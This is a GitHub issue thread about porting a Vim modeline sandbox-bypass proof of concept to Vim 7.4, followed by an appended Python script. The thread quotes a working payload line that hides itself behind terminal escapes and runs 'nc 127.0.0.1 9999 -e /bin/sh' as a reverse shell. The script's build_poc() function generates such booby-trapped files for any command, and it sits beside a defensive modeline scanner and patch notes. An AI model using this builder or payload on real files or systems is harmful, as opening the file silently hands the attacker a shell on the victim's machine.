numirias / security

Some of my security stuff and vulnerabilities. Nothing advanced. More to come.

How to construct poc on vim74?

Larryxi opened this issue · comments

Hi,

I realize that the function assert_fails() was added in version 8. Does that mean vim74 is not affected by this vulnerability, or how could I construct a PoC on vim74?

Thanks

Try replacing assert_fails() with execute(). The sandbox bypass is based on the :source! command. assert_fails() and execute() are just ways to run it.

Is it true?

^[[?7l^[SNothing here.^[:silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=execute('set\ fde=x\ \ |\ source\!\ \%') fdl=0: ^V^[[1G^V^[[KNothing here."^V^[[D

Ah, my bad. Actually, execute() also isn't implemented back in 7.4, so this won't work either. Off the top of my head, I can't give you an example of how to make the PoC compatible with 7.4, but there likely is some way.

So how do I reproduce this bug in vim72?

I also could not reproduce this issue in version 7.4.1689. If anyone can reproduce this for this version, please let me know.

PS: I could make it work on NVIM v0.3.5-11-g1060bfd03.
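To make the exchange above concrete, here is an added example of my own (not code from the numirias/security repository or from any participant in this issue). It builds a single-line file with the same structure as the PoC pasted earlier in the thread, for either assert_fails() or execute() as the function that runs the `:source!` command; it decodes the caret notation of the pasted line (^[ is ESC, ^V is Ctrl-V) so that line can be fed to a checker; and it scans text for modelines that set an expression option such as fde= and call :source. The Ex payload, decoy text and sample modelines are constructed for the demonstration, and the regular expressions are my approximation of Vim's two modeline forms, not Vim's own parser.

```python
"""
Added example (mine, not code from the numirias/security repository or from
anyone in this issue): build the thread's modeline payload for either
assert_fails() or execute(), and scan text for modelines of that shape.
"""
import re
from typing import List, Tuple

ESC, CTRL_V = "\x1b", "\x16"      # shown as ^[ and ^V in the pasted line


def decode_caret(s: str) -> str:
    """Turn cat -v style caret notation (^[ , ^V, ...) back into control bytes."""
    return re.sub(r"\^([@-_])", lambda m: chr(ord(m.group(1)) ^ 0x40), s)


def build_poc(ex_payload: str, runner: str = "assert_fails",
              decoy: str = "Nothing here.") -> str:
    """Single-line file with the structure of the PoC pasted in the thread.

    Opening the file triggers the modeline: fdm=expr makes Vim evaluate the
    fold expression, which (via `runner`) runs ":set fde=x | source! %".
    :source! then replays the file as Normal-mode keystrokes: ESC, then S
    replaces the line with the decoy, ESC, then ":" runs `ex_payload`.
    `runner` is the function wrapped around the Ex string: assert_fails
    (the original PoC) or execute (the reply's suggested replacement).
    The ESC[...] sequences are terminal controls so that cat shows only
    the decoy; the '"' before "vim:" makes the modeline an Ex comment.
    """
    modeline = ('" vim: set fen fdm=expr fde=' + runner
                + "('set\\ fde=x\\ \\|\\ source\\!\\ \\%') fdl=0:")
    return (ESC + "[?7l"                                  # terminal: no line wrap
            + ESC + "S" + decoy + ESC                     # Normal mode: S <decoy> ESC
            + ":" + ex_payload                            # Normal mode: Ex command
            + " | redraw! | file | silent! # " + modeline  # trailing part of the pasted PoC
            + CTRL_V + ESC + "[1G" + CTRL_V + ESC + "[K"  # terminal: column 1, erase line
            + decoy + '"' + CTRL_V + ESC + "[D")          # terminal: step back over the quote


# Options that hold a Vim expression.  A modeline may set them and Vim
# evaluates the value later (folding, indenting, formatting) in the sandbox;
# that evaluation is where the :source! trick from this thread runs.
EXPR_OPTIONS = ("fde", "foldexpr", "fdt", "foldtext",
                "inde", "indentexpr", "fex", "formatexpr")

# "vi:", "vim:", "Vim:" or " ex:", optionally followed by "set ... :" (both modeline forms).
MODELINE_RE = re.compile(r"(?:^|\s)(?:vi|vim|Vim[<=>]?\d*|ex):\s*(?:set?\s+)?(.*)")
# option=value; a value runs to the next unescaped ':' or blank, as in :set.
EXPR_OPT_RE = re.compile(r"\b(" + "|".join(EXPR_OPTIONS) + r")=((?:\\.|[^:\s\\])+)")
# :source / :so, with or without "!", inside the unescaped expression.
SOURCE_RE = re.compile(r"(?<!\w)so(?:u(?:r(?:c(?:e)?)?)?)?!?(?=\s|%|$)")


def scan_modelines(text: str) -> List[Tuple[int, str, str, str]]:
    """Return (line, option, value, reason) for each modeline that sets an
    expression option.  A value that calls :source is the pattern from this
    thread; any other value still deserves a look, because a file should
    never need a modeline to set these options."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = MODELINE_RE.search(line)
        if not m:
            continue
        for opt, raw in EXPR_OPT_RE.findall(m.group(1)):
            value = re.sub(r"\\(.)", r"\1", raw)          # undo :set escaping
            if SOURCE_RE.search(value):
                reason = "expression option runs :source (sandbox bypass from this thread)"
            else:
                reason = "modeline sets an expression option"
            findings.append((n, opt, value, reason))
    return findings


# Constructed sample: the line pasted in the thread, in caret notation as shown.
PASTED_LINE = r"""^[[?7l^[SNothing here.^[:silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=execute('set\ fde=x\ \ |\ source\!\ \%') fdl=0: ^V^[[1G^V^[[KNothing here."^V^[[D"""

if __name__ == "__main__":
    samples = (decode_caret(PASTED_LINE),
               build_poc("silent! w | call system('id > /tmp/modeline-test')", "execute"),
               "# vim: set ts=4 sw=4 et:\n")
    for sample in samples:
        print(scan_modelines(sample))
```

Whether a given build can run the payload depends only on the wrapper function existing: assert_fails() and execute() both arrived as 7.4.x patches well after the 7.4.0 release, which is exactly the wall the thread runs into. The :source-in-sandbox hole itself was closed in Vim patch 8.1.1365, and `:set nomodeline` (or `modelines=0`) removes the entry point on any version.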